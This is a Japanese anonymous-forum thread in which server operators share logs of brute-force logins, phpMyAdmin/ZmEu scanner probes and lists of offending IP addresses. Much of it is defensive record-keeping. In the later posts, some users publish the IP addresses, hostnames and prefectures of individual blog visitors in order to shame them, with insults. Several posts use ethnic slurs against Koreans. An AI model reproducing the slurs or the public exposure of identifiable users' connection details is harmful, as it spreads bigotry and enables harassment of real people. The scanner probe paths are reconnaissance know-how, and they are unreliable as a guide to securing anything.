**DNS未登録さん** · 2012/09/22(土) 22:15:45.61

>150
違法なら警察へGO!
警察庁：都道府県警察本部のサイバー犯罪相談窓口等一覧
http://www.npa.go.jp/cyber/soudan.htm

**DNS未登録さん** · 2012/10/02(火) 22:00:03.21

今日メールサーバーへの攻撃がすげぇんだけど・・・

**DNS未登録さん** · 2012/10/05(金) 11:43:34.62

>>152 こいつら？
12.7.145.50
12.71.117.172
12.238.210.67
24.39.213.154
24.97.64.230
24.103.52.22
24.123.56.246
24.186.3.95
24.234.155.80
50.75.160.114,
63.238.5.66
68.15.108.58
68.16.48.68
65.40.186.170
66.134.197.178
67.52.184.130
67.76.162.45

**DNS未登録さん** · 2012/10/05(金) 11:45:21.53

67.112.239.113
70.43.109.131
70.60.238.70
72.89.191.60
70.255.147.109
108.64.133.67
108.71.19.30
108.162.17.130
173.12.143.130
173.44.136.74
173.162.218.11
173.200.3.25
209.132.232.92
209.166.158.116
216.1.42.19

以上のIPからうちのメールサーバーに数回ずつ短時間に連続して来てた

**DNS未登録さん** · 2012/12/15(土) 15:08:28.20

【一部抜粋】
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<zaragoza>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<boullosa>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<capurro>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<phernandez>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<lucero>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<moreno>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<munoz>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx

ユーザ名変えて物凄い勢いで来てた

**DNS未登録さん** · 2013/02/09(土) 09:18:43.19

66.161.176.108 - - [06/Feb/2013:21:06:40 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:10 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /db/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /PMA/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /pma/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /mysql/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /myadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /phpadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /webadmin/main.php HTTP/1.0" 404 1001 "-" "-"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"

**DNS未登録さん** · 2013/02/09(土) 09:21:02.01

83.238.212.227 - - [06/Feb/2013:18:09:28 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:30 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:31 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
141.212.121.10 - - [05/Feb/2013:23:42:40 +0900] "\x80w\x01\x03\x01" 501 951 "-" "-"
MyAdminなんかねえよ馬鹿

**DNS未登録さん** · 2013/02/10(日) 20:46:55.12

pmaアタックしょっちゅう来るよね
うちはディレクトリ名に誕生日入れてるから大丈夫

**DNS未登録さん** · 2013/02/14(木) 19:09:02.51

126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"

softbank126009120142.bbtec.netで検索すると大量に引っかかるから踏み台経由なんだろう

**DNS未登録さん** · 2013/02/22(金) 17:41:03.39

俺の名前は脱糞マン　今日も脱糞もりもりー！

**DNS未登録さん** · 2013/05/31(金) 21:16:51.20

192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
46.249.33.47 - - [31/May/2013:18:21:29 +0900] "GET /epgrec/systemSetting.php HTTP/1.1" 404 1062 "-" "-"

**DNS未登録さん** · 2013/08/05(月) NY:AN:NY.AN

IPアドレス 118.22.250.219
ホスト名 p3219-ipngn1202marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県東京都

F5連打やめろカス野郎!!

**DNS未登録さん** · 2013/08/08(木) NY:AN:NY.AN

110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144

**DNS未登録さん** · 2013/08/16(金) NY:AN:NY.AN

IPアドレス 219.33.248.7
ホスト名 softbank219033248007.bbtec.net
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線 xDSL
都道府県愛知県

**DNS未登録さん** · 2013/08/16(金) NY:AN:NY.AN

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:46

error 403

**DNS未登録さん** · 2013/08/16(金) NY:AN:NY.AN

IPアドレス 103.28.96.56
ホスト名 dhcp38056.orihime.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線該当なし
都道府県該当なし

**DNS未登録さん** · 2013/08/23(金) NY:AN:NY.AN

IPアドレス 61.46.103.148
ホスト名 zaq3d2e6794.zaq.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線 CATV
都道府県大阪府

**DNS未登録さん** · 2013/08/26(月) NY:AN:NY.AN

IPアドレス 123.225.228.170
ホスト名 p3170-ipbf1705sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県北海道

**DNS未登録さん** · 2013/08/26(月) NY:AN:NY.AN

27.102.192.140からssh

/var/log/auth.log
Aug 26 06:24:32 ***** sshd[13852]: Invalid user bart from 27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: input_userauth_request: invalid user bart [preauth]
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): check pass; user unknown
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): getting password (0x00000388)
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): pam_get_item returned a password
Aug 26 06:24:34 ***** sshd[13852]: Failed password for invalid user bart from 27.102.192.140 port 33426 ssh2
Aug 26 06:24:34 ***** sshd[13852]: Received disconnect from 27.102.192.140: 11: Bye Bye [preauth]

**DNS未登録さん** · 2013/08/29(木) NY:AN:NY.AN

IPアドレス 111.108.19.55
ホスト名 kd111108019055.ppp-bb.dion.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県栃木県

**DNS未登録さん** · 2013/08/30(金) NY:AN:NY.AN

IPアドレス 223.25.160.33
ホスト名 g1-223-25-160-33.bmobile.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線該当なし
都道府県該当なし

**DNS未登録さん** · 2013/08/31(土) NY:AN:NY.AN

IPアドレス 106.177.13.31
ホスト名 kd106177013031.ppp-bb.dion.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線種別不明
都道府県該当なし

**DNS未登録さん** · 2013/09/02(月) 16:28:44.06

IPアドレス 118.21.111.71
ホスト名 i118-21-111-71.s30.a048.ap.plala.or.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県該当なし

**DNS未登録さん** · 2013/09/03(火) 17:33:44.20

KD106177151101.ppp-bb.dion.ne.jp

**DNS未登録さん** · 2013/09/11(水) 22:33:45.90

IPアドレス 125.1.164.67
ホスト名 nttkyo455067.tkyo.nt.ngn2.ppp.infoweb.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県東京都

**DNS未登録さん** · 2013/09/18(水) 18:52:43.64

IPアドレス 153.160.118.147
ホスト名 p7147-ipngn4701marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県東京都

F5連打キチガイ

**DNS未登録さん** · 2013/09/26(木) 10:43:46.87

IPアドレス 220.2.96.8
ホスト名 softbank220002096008.bbtec.net
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線 xDSL
都道府県静岡県

しつけーよカスヤルァー!!
二度と来るなよ!!

**DNS未登録さん** · 2013/09/28(土) 12:03:51.71

IPアドレス 106.159.106.72
ホスト名 KD106159106072.ppp-bb.dion.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線種別不明
都道府県北海道

**DNS未登録さん** · 2013/09/29(日) 19:52:16.89

IPアドレス 58.183.196.116
ホスト名 116.196.183.58.megaegg.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県広島県

F5連打うぜえ

**DNS未登録さん** · 2013/10/03(木) 22:55:20.49

IPアドレス 61.193.122.189
ホスト名 flh1adk189.hkd.mesh.ad.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県北海道

**DNS未登録さん** · 2013/10/26(土) 17:45:20.67

IPアドレス 121.84.32.120
ホスト名 121-84-32-120f1.hyg2.eonet.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県兵庫県

消え失せろクズ野郎!!
邪魔なんだよ!!

**DNS未登録さん** · 2013/10/27(日) 22:37:50.15

IPアドレス 114.167.56.193
ホスト名 p1193-ipbf2406sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県北海道

消え失せろクズ野郎!!
邪魔なんだよ!!

**DNS未登録さん** · 2013/11/08(金) 23:37:18.06

IPアドレス 114.20.150.51
ホスト名 KD114020150051.ppp.prin.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線 PHS
都道府県該当なし

ブログ荒らしの糞チョン

**DNS未登録さん** · 2013/11/08(金) 23:43:48.40

ファビョった朝鮮人うぜー

**DNS未登録さん** · 2013/11/09(土) 08:14:46.27

リモートホスト i121-117-132-189.s41.a030.ap.plala.or.jp
IPアドレス 121.117.132.189

くだらんクエリ文字列付きでアクセスしてんじゃねーよクズ!!

**DNS未登録さん** · 2013/11/10(日) 14:21:40.13

IPアドレス 112.216.76.110

2013年11月08日(金)１時間弱の間にSMTP鯖に5972回不正アクセス

**DNS未登録さん** · 2013/11/10(日) 17:35:26.12

1分に100回？なんかミスったんじゃないのｗ

**DNS未登録さん** · 2013/11/10(日) 19:06:57.94

ミスって何？
ユーザー名とpass　ランダムに変えてたから総当たりスクリプトだろ

**DNS未登録さん** · 2013/11/10(日) 19:39:49.84

IPアドレス 113.147.246.150
ホスト名 KD113147246150.ppp-bb.dion.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県北海道

くんじゃねーよクズ野郎!!

**DNS未登録さん** · 2013/11/10(日) 20:43:43.12

今日も韓国人を叩く某ブログで

ウィルコムプロバイダのチョンが発狂しています

いい加減そろそろ通報しようと思う。

**DNS未登録さん** · 2013/11/10(日) 20:54:43.23

2013-11-10 20:35:19
記事 Tomo's Blog
ブラウザ Mozilla/3.0(WILLCOM;KYOCERA/WX01K/2;2.0.3.14.000000/1/C256) NetFront/3.4
リモートホスト 114.20.150.165 (KD114020150165.ppp.prin.ne.jp)

IP晒します。

IPアドレス 114.20.150.165
ホスト名 KD114020150165.ppp.prin.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線 PHS
都道府県該当なし

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 114.20.128.0/17
b. [ネットワーク名] DP-PACKET2
f. [組織名] 株式会社ウィルコム
g. [Organization] WILLCOM, Inc.

**DNS未登録さん** · 2013/11/11(月) 00:27:08.99

お前さ、詮索してきてんじゃねーよ!!

2013-11-10 22:45:35
記事 Tomo's Blog
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:48:23
記事 Tomo's Blog
リファラ俺の他のサイト
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:48:39
記事ブログ開設しました!
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:49:26
記事 Tomo's Blog
リファラ http://blog.livedoor.jp/oboega/lite/archives/34528159/comments/7759059/?p=19
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

**DNS未登録さん** · 2013/11/11(月) 00:28:43.93

誰が不人気だ、俺のブログはページランク4だぞ

なめんじゃねーぞコラ!!

**DNS未登録さん** · 2013/11/11(月) 00:30:40.07

そろそろチョン野郎をアク禁にするか。

**DNS未登録さん** · 2013/11/11(月) 12:47:25.88

>>188
単にSMTPとしか書いて無かったらメール転送のリトライだと思うだろう

**DNS未登録さん** · 2013/11/13(水) 18:35:10.97

サブミッションじゃね？

知らないけど。

**DNS未登録さん** · 2013/11/20(水) 15:11:20.22

IPアドレス 162.210.196.165
ホスト名対応するホスト名がありません。
IPアドレス割当国アメリカ合衆国 ( us )
市外局番該当なし
接続回線該当なし
都道府県該当なし

邪魔だよデコスケ

**DNS未登録さん** · 2013/11/21(木) 15:00:19.78

IPアドレス 122.18.75.228
ホスト名 p1228-ipbf802sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県北海道

邪魔だよデコスケ

**DNS未登録さん** · 2013/11/23(土) 03:25:43.53

netstatでよく出てくるgooglebotさん?なのかな
TCP <hostname>:2035 nrt04s05-in-f3.1e100.net:http TIME_WAIT

薄気味悪ぃーくらいに出てくる
うちは単なるクライアント環境だし外部向けには何も公開していないんだが
javascript切ってGoogleにアクセスすると
必ずと言っていいほどにしばらくの間このドメインから訪問を受ける

**DNS未登録さん** · 2013/11/29(金) 07:53:33.12

FFの悪意のあるサイトのブロック切れ。